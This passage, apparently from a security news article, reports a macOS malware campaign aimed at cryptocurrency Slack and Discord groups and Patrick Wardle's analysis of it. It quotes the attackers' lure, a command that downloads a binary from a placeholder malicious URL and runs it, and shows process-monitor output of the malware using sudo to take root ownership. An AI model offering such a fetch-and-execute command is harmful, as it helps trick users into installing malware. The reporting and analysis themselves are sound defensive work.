The popular experts decided to analyze the malicious code after the security researcher Remco Verhoef ( @remco_verhoef ) posted an interesting entry to SANS ‘InfoSec Handlers Diary Blog’ titled “ Crypto community target of MacOS malware .”

“Previous days we’ve seen multiple MacOS malware attacks, originating within crypto related Slack or Discord chats groups by impersonating admins or key people. Small snippets are being shared, resulting in downloading and executing a malicious binary.” wrote Verhoef.

The Wardle intent was to demonstrate that the Objective-See’s tools can generically thwart this new threat even if it was undetected by all the anti-virus software.

Verhoef noticed that the attack was originating within crypto related Slack or Discord chats groups by impersonating admins or key people.

The attackers shared small code snippets like the following one resulting in downloading and executing a malicious binary.

$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

Wardle noticed that the malicious binary is not signed, this means it would be blocked by GateKeeper, but attackers overwhelmed this limitation by making the victims to download and run the binary directly via terminal commands.

Wardle conducted a dynamic analysis of the malware using a High Sierra virtual machine with various Objective-See tools installed.

The malware first sets script to be owned as root

# procInfo monitoring for process events... process start: pid: 432 path: /usr/bin/sudo args: ( "/usr/bin/sudo", "-S", "-p", "#node-sudo-passwd#", chown, root, "/tmp/script.sh" )

then it changes file’s permissions to root by executing the sudo command, but this will require the user to enter the password in the terminal.